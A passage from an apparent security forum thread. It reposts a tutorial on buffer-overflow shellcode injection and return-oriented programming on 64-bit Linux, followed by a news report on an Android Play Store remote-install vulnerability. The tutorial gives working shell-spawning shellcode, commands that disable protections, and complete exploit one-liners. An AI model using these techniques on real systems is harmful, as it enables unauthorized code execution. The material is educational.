forgiving: running "/bin/sh" with NULL argv and envp succeeds: ubuntu:~$ gcc shell.c ubuntu:~$ ./a.out $ In any case, adding argv and envp arrays is straightforward. The shell game We extract the payload we wish to inject. Let’s examine the machine code: $ objdump -d a.out | sed -n '/needle0/,/needle1/p' 00000000004004bf <needle0>: 4004bf: eb 0e jmp 4004cf <there> 00000000004004c1 <here>: 4004c1: 5f pop %rdi 4004c2: 48 31 c0 xor %rax,%rax 4004c5: b0 3b mov $0x3b,%al 4004c7: 48 31 f6 xor %rsi,%rsi 4004ca: 48 31 d2 xor %rdx,%rdx 4004cd: 0f 05 syscall 00000000004004cf <there>: 4004cf: e8 ed ff ff ff callq 4004c1 <here> 4004d4: 2f (bad) 4004d5: 62 (bad) 4004d6: 69 6e 2f 73 68 00 ef imul $0xef006873,0x2f(%rsi),%ebp 00000000004004dc <needle1>: On 64-bit systems, the code segment is usually placed at 0x400000, so in the binary, our code lies starts at offset 0x4bf and finishes right before offset 0x4dc. This is 29 bytes: $ echo $((0x4dc-0x4bf)) 29 We round this up to the next multiple of 8 to get 32, then run: $ xxd -s0x4bf -l32 -p a.out shellcode Let’s take a look: $ cat shellcode eb0e5f4831c0b03b4831f64831d20f05e8edffffff2f62696e2f736800ef bead Learn bad C in only 1 hour! An awful C tutorial might contain an example like the following victim.c: #include <stdio.h> int main() { char name[64]; puts("What's your name?"); gets(name); printf("Hello, %s!\n", name); return 0; } Thanks to the cdecl calling convention for x86 systems, if we input a really long string, we’ll overflow the name buffer, and overwrite the return address. Enter the shellcode followed by the right bytes and the program will unwittingly run it when trying to return from the main function. The Three Trials of Code Injection Alas, stack smashing is much harder these days. On my stock Ubuntu 12.04 install, there are 3 countermeasures: GCC Stack-Smashing Protector (SSP), aka ProPolice: the compiler rearranges the stack layout to make buffer overflows less dangerous and inserts runtime stack integrity checks. Executable space protection (NX): attempting to execute code in the stack causes a segmentation fault. This feature goes by many names, e.g. Data Execution Prevention (DEP) on Windows, or Write XOR Execute (W^X) on BSD. We call it NX here, because 64-bit Linux implements this feature with the CPU’s NX bit ("Never eXecute"). Address Space Layout Randomization (ASLR): the location of the stack is randomized every run, so even if we can overwrite the return address, we have no idea what to put there. We’ll cheat to get around them. Firstly, we disable the SSP: $ gcc -fno-stack-protector -o victim victim.c Next, we disable executable space protection: $ execstack -s victim Lastly, we disable ASLR when running the binary: $ setarch `arch` -R ./victim What's your name? World Hello, World! One more cheat. We’ll simply print the buffer location: #include <stdio.h> int main() { char name[64]; printf("%p\n", name); // Print address of buffer. puts("What's your name?"); gets(name); printf("Hello, %s!\n", name); return 0; } Recompile and run it: $ setarch `arch` -R ./victim 0x7fffffffe090 What's your name? The same address should appear on subsequent runs. We need it in little-endian: $ a=`printf %016x 0x7fffffffe090 | tac -rs..` $ echo $a 90e0ffffff7f0000 Success! At last, we can attack our vulnerable program: $ ( ( cat shellcode ; printf %080d 0 ; echo $a ) | xxd -r -p ; cat ) | setarch `arch` -R ./victim The shellcode takes up the first 32 bytes of the buffer. The 80 zeroes in the printf represent 40 zero bytes, 32 of which fill the rest of the buffer, and the remaining 8 overwrite the saved location of the RBP register. The next 8 overwrite the return address, and point to the beginning of the buffer where our shellcode lies. Hit Enter a few times, then type "ls" to confirm that we are indeed in a running shell. There is no prompt, because the standard input is provided bycat, and not the terminal (/dev/tty). The Importance of Being Patched Just for fun, we’ll take a detour and look into ASLR. In the old days, you could read the ESP register of any process by looking at /proc/pid/stat. This leak was plugged long ago. (Nowadays, a process can spy on a given process only if it has permission to ptrace() it.) Let’s pretend we’re on an unpatched system, as it’s more satisfying to cheat less. Also, we see first-hand the importance of being patched, and why ASLR needs secrecy as well as randomness. Inspired by a presentation by Tavis Ormandy and Julien Tinnes, we run: $ ps -eo cmd,esp First, we run the victim program without ASLR: $ setarch `arch` -R ./victim and in another terminal: $ ps -o cmd,esp -C victim ./victim ffffe038 Thus while the victim program is waiting for user input, it’s stack pointer is 0x7fffffe038. We calculate the distance from this pointer to the name buffer: $ echo $((0x7fffffe090-0x7fffffe038)) 88 We are now armed with the offset we need to defeat ASLR on older systems. After running the victim program with ASLR reenabled: $ ./victim we can find the relevant pointer by spying on the process, then adding the offset: $ ps -o cmd,esp -C victim ./victim 43a4b538 $ printf %x\\n $((0x7fff43a4b538+88)) 7fff43a4b590 Perhaps it’s easiest to demonstrate with named pipes: $ mkfifo pip $ cat pip | ./victim In another terminal, we type: $ sp=`ps --no-header -C victim -o esp` $ a=`printf %016x $((0x7fff$sp+88)) | tac -r -s..` $ ( ( cat shellcode ; printf %080d 0 ; echo $a ) | xxd -r -p ; cat ) > pip and after hitting enter a few times, we can enter shell commands. Executable space perversion Recompile the victim program without running the execstack command. Alternatively, reactivate executable space protection by running: $ execstack -c victim Try attacking this binary as above. Our efforts are thwarted as soon as the program jumps to our injected shellcode in the stack. The whole area is marked nonexecutable, so we get shut down. Return-oriented programming deftly sidesteps this defence. The classic buffer overflow exploit fills the buffer with code we want to run; return-oriented programming instead fills the buffer with addresses of snippets of code we want to run, turning the stack pointer into a sort of indirect instruction pointer. The snippets of code are handpicked from executable memory: for example, they might be fragments of libc. Hence the NX bit is powerless to stop us. In more detail: We start with SP pointing to the start of a series of addresses. A RET instruction kicks things off. Forget RET’s usual meaning of returning from a subroutine. Instead, focus on its effects: RET jumps to the address in the memory location held by SP, and increments SP by 8 (on a 64-bit system). After executing a few instructions, we encounter a RET. See step 2. In return-oriented programming, a sequence of instructions ending in RET is called a gadget. Go go gadgets Our mission is to call the libc system() function with "/bin/sh" as the argument. We can do this by calling a gadget that assigns a chosen value to RDI and then jump to the system() libc function. First, where’s libc? $ locate libc.so /lib/i386-linux-gnu/libc.so.6 /lib/x86_64-linux-gnu/libc.so.6 /lib32/libc.so.6 /usr/lib/x86_64-linux-gnu/libc.so My system has a 32-bit and a 64-bit libc. We want the 64-bit one; that’s the second on the list. Next, what kind of gadgets are available anyway? $ objdump -d /lib/x86_64-linux-gnu/libc.so.6 | grep -B5 ret The selection is reasonable, but our quick-and-dirty search only finds intentional snippets of code. We can do better. In our case, we would very much like to execute: pop %rdi retq while the pointer to "/bin/sh" is at the top of the stack. This would assign the pointer to RDI before advancing the stack pointer. The corresponding machine code is the two-byte sequence 0x5f 0xc3, which ought to occur somewhere in libc. Sadly, I know of no widespread Linux tool that searches a file for a given sequence of bytes; most tools seem oriented towards text files and expect their inputs to be organized with newlines. (I’m reminded of Rob Pike’s "Structural Regular Expressions".) We settle for an ugly workaround: $ xxd -c1 -p /lib/x86_64-linux-gnu/libc.so.6 | grep -n -B1 c3 | grep 5f -m1 | awk '{printf"%x\n",$1-1}' 22a12 In other words: Dump the library, one hex code per line. Look for "c3", and print one line of leading context along with the matches. We also print the line numbers. Look for the first "5f" match within the results. As line numbers start from 1 and offsets start from 0, we must subtract 1 to get the latter from the former. Also, we want the address in hexadecimal. Asking Awk to treat the first argument as a number (due to the subtraction) conveniently drops all the characters after the digits, namely the "-5f" that grep outputs. We’re almost there. If we overwrite the return address with the following sequence: libc’s address + 0x22a12 address of "/bin/sh" address of libc’s system() function then on executing the next RET instruction, the program will pop the address of "/bin/sh" into RDI thanks to the first gadget, then jump to the system function. Many happy returns In one terminal, run: $ setarch `arch` -R ./victim And in another: $ pid=`ps -C victim -o pid --no-headers | tr -d ' '` $ grep libc /proc/$pid/maps 7ffff7a1d000-7ffff7bd0000 r-xp 00000000 08:05 7078182 /lib/x86_64-linux-gnu/libc-2.15.so 7ffff7bd0000-7ffff7dcf000 ---p 001b3000 08:05 7078182 /lib/x86_64-linux-gnu/libc-2.15.so 7ffff7dcf000-7ffff7dd3000 r--p 001b2000 08:05 7078182 /lib/x86_64-linux-gnu/libc-2.15.so 7ffff7dd3000-7ffff7dd5000 rw-p 001b6000 08:05 7078182 /lib/x86_64-linux-gnu/libc-2.15.so Thus libc is loaded into memory starting at 0x7ffff7a1d000. That gives us our first ingredient: the address of the gadget is 0x7ffff7a1d000 + 0x22a12. Next we want "/bin/sh" somewhere in memory. We can proceed similarly to before and place this string at the beginning of the buffer. From before, its address is 0x7fffffffe090. The final ingredient is the location of the system library function. $ nm -D /lib/x86_64-linux-gnu/libc.so.6 | grep '\<system\>' 0000000000044320 W system Gotcha! The system function lives at 0x7ffff7a1d000 + 0x44320. Putting it all together: $ (echo -n /bin/sh | xxd -p; printf %0130d 0; printf %016x $((0x7ffff7a1d000+0x22a12)) | tac -rs..; printf %016x 0x7fffffffe090 | tac -rs..; printf %016x $((0x7ffff7a1d000+0x44320)) | tac -rs..) | xxd -r -p | setarch `arch` -R ./victim Hit enter a few times, then type in some commands to confirm this indeed spawns a shell. There are 130 0s this time, which xxd turns into 65 zero bytes. This is exactly enough to cover the rest of the buffer after "/bin/sh" as well as the pushed RBP register, so that the very next location we overwrite is the top of the stack. Debriefing In our brief adventure, ProPolice is the best defence. It tries to move arrays to the highest parts of the stack, so less can be achieved by overflowing them. Additionally, it places certain values at the ends of arrays, which are known as canaries. It inserts checks before return instructions that halts execution if the canaries are harmed. We had to disable ProPolice completely to get started. ASLR also defends against our attack provided there is sufficient entropy, and the randomness is kept secret. This is in fact rather tricky. We saw how older systems leaked information via /proc. In general, attackers have devised many ingenious methods to learn addresses that are meant to be hidden. Last, and least, we have executable space protection. It turned out to be toothless. So what if we can’t run code in the stack? We’ll simply point to code elsewhere and run that instead! We used libc, but in general, there is usually some corpus of code we can raid. For example, researchers compromised a voting machine with extensive executable space protection, turning its own code against it. Funnily enough, the cost of each measure seems inversely proportional to its benefit: Executable space protection requires special hardware (the NX bit) or expensive software emulation. ASLR requires cooperation from many parties. Programs and libraries alike must be loaded in random addresses. Information leaks must be plugged. ProPolice requires a compiler patch. Security theater One may ask: if executable space protection is so easily circumvented, is it worth having? Somebody must have thought so, because it is so prevalent now. Perhaps it’s time to ask: is executable space protection worth removing? Is executable space protection better than nothing? We just saw how trivial it is to stitch together shreds of existing code to do our dirty work. We barely scratched the surface: with just a few gadgets, any computation is possible. Furthermore, there are tools that mine libraries for gadgets, and compilers that convert an input language into a series of addresses, ready for use on an unsuspecting non-executable stack. A well-armed attacker may as well forget executable space protection even exists. Therefore, I argue executable space protection is worse than nothing. Aside from being high-cost and low-benefit, it segregates code from data. As Rob Pike puts it: This flies in the face of the theories of Turing and von Neumann, which define the basic principles of the stored-program computer. Code and data are the same, or at least they can be. But worse still are its implications for programmers. Executable space protection interferes with self-modifying code, which is invaluable for just-in-time compiling, and for miraculously breathing new life into ancient calling conventions set in stone. In a paper describing how to add nested functions to C despite its simple calling convention and thin pointers, Thomas Breuel observes: There are, however, some architectures and/or operating systems that forbid a program to generate and execute code at runtime. We consider this restriction arbitrary and consider it poor hardware or software design. Implementations of programming languages such as FORTH, Lisp, or Smalltalk can benefit significantly from the ability to generate or modify code quickly at runtime. Epilogue Many thanks to Hovav Shacham, who first brought return-oriented programming to my attention. He co-authored a comprehensive introduction to return-oriented programming. Also, see the technical details of howreturn-oriented programming usurped a voting machine. We focused on a specific attack. The defences we ran into can be much less effective for other kinds of attacks. For example, ASLR has a hard time fending off heap spraying. Return-to-libc Return-oriented programming is a generalization of the return-to-libc attack, which calls library functions instead of gadgets. In 32-bit Linux, the C calling convention is helpful, since arguments are passed on the stack: all we need to do is rig the stack so it holds our arguments and the address the library function. When RET is executed, we’re in business. However, the 64-bit C calling convention is identical to that of 64-bit system calls, except RCX takes the place of R10, and more than 6 arguments may be present (any extras are placed on the stack in right-to-left order). Overflowing the buffer only allows us to control the contents of the stack, and not the registers, complicating return-to-libc attacks. The new calling convention still plays nice with return-oriented programming, because gadgets can manipulate registers. GDB Just as builders remove the scaffolding after finishing a skyscraper, I omitted the GDB sessions which helped me along the way. Did you think I could get these exploits byte-perfect the first time? I wish! Speaking of which, I’m almost certain I’ve never used a debugger to debug! I’ve only used them to program in assembly, to investigate binaries for which I lacked the source, and now, for buffer overflow exploits. A quote from Linus Torvalds come to mind: I don’t like debuggers. Never have, probably never will. I use gdb all the time, but I tend to use it not as a debugger, but as a disassembler on steroids that you can program. as does another from Brian Kernighan: The most effective debugging tool is still careful thought, coupled with judiciously placed print statements. I’m unsure if I’ll ever write about GDB, since so many guides already exist. For now, I’ll list a few choice commands: $ gdb victim start < shellcode disas break *0x00000000004005c1 cont p $rsp ni si x/10i0x400470 GDB helpfully places the code deterministically, though the location it chooses differs slightly to the shell’s choice when ASLR is disabled. Transcripts I’ve summarized the above in a couple of shell scripts: classic.sh: the classic buffer overflow attack. rop.sh: the return-oriented programming version. They work on my system (Ubuntu 12.04 on x86_64). Sursa: http://crypto.stanford.edu/~blynn/rop/
  24. How to remotely install malicious apps on Android devices by Pierluigi Paganini on February 13th, 2015 Security researchers discovered how to install and launch malicious applications remotely on Android devices exploiting two flaws. Security researchers have uncovered a couple of vulnerabilities in the Google Play Store that could allow cyber criminals to install and launch malicious apps remotely on Android mobile devices. The expert Tod Beardsley, technical lead for the Metasploit Framework at Rapid7 explained that attackers can install any arbitrary app from the Play store onto victims’ device even without the consent. This is possible by combining the exploitation of an X-Frame-Options (XFO) vulnerability with Android WebView (Jelly Bean) flaw. The flaw affects mobile devices running Android version 4.3 Jelly Bean and earlier versions, also devices running third party browsers are vulnerable. The researcher reported that the web browser in Android 4.3 and prior versions are vulnerable to a Universal Cross-Site Scripting (UXSS) attack, meanwhile the Google Play Store is vulnerable to a Cross-Site Scripting (XSS) flaw. In the UXSS attack scenario, hackers exploit client-side vulnerabilities affecting a web browser or browser extensions to run a XSS attack, which allows the execution of malicious code bypassing security protection mechanisms in the web browser. “Users of these platforms may also have installed vulnerable aftermarket browsers,” Beardsley wrote in a blog post on Tuesday.”Of the vulnerable population, it is expected that many users are habitually signed into Google services, such as Gmail or YouTube. These mobile platforms are the the ones most at risk. Other browsers may also be affected.” “Until the Google Play store XFO [X-Frame-Options] gap is mitigated, users of these web applications who habitually sign in to their Google Account will remain vulnerable.” The expert provided the JavaScript and Ruby code that could be used get a response from the play.google.com domain without an appropriate XFO header: Rapid7 has already published a Metasploit module to exploit the flaw, Module for R7-2015-02 #4742, which is available made public on Github. “This module combines two vulnerabilities to achieve remote code execution on affected Android devices. First, the module exploits CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in versions of Android’s open source stock browser (the AOSP Browser) prior to 4.4. Second, the Google Play store’s web interface fails to enforce a X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be targeted for script injection. As a result, this leads to remote code execution through Google Play’s remote installation feature, as any application available on the Google Play store can be installed and launched on the user’s device. This module requires that the user is logged into Google with a vulnerable browser.” reads the advisory. To mitigate the security issue: Use a web browser that is not affected by UXSS flaws (i.e. Google Chrome or Mozilla Firefox or Dolphin). Log out of the Google Play store account in order to avoid the vulnerability. Pierluigi Paganini (Security Affairs – Google Android, hacking) Sursa: http://securityaffairs.co/wordpress/33456/hacking/remotely-hack-android.html
×
×
  • Create New...